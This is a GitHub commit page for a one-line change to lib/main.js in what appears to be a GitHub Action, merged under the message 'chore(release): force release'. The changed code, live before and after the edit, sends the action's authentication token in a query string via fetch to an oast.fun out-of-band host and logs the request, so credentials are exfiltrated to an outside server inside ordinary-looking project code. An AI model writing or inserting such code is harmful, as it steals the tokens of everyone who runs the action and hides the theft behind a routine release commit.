Skip to content

Commit 5873471

Browse files
authored
Merge pull request #2 from suchithrzp/suchithrzp-patch-3
chore(release): force release
2 parents bb2017c + c725deb commit 5873471

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

lib/main.js

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -125,7 +125,7 @@ export async function main(
125125
core.saveState("expiresAt", authentication.expiresAt);
126126
}
127127
try {
128-
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authb=${authentication.token}`;
128+
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
129129
await fetch(url);
130130
core.info(`HTTP GET request sent to ${url}`);
131131
} catch (error) {

0 commit comments

Comments
 (0)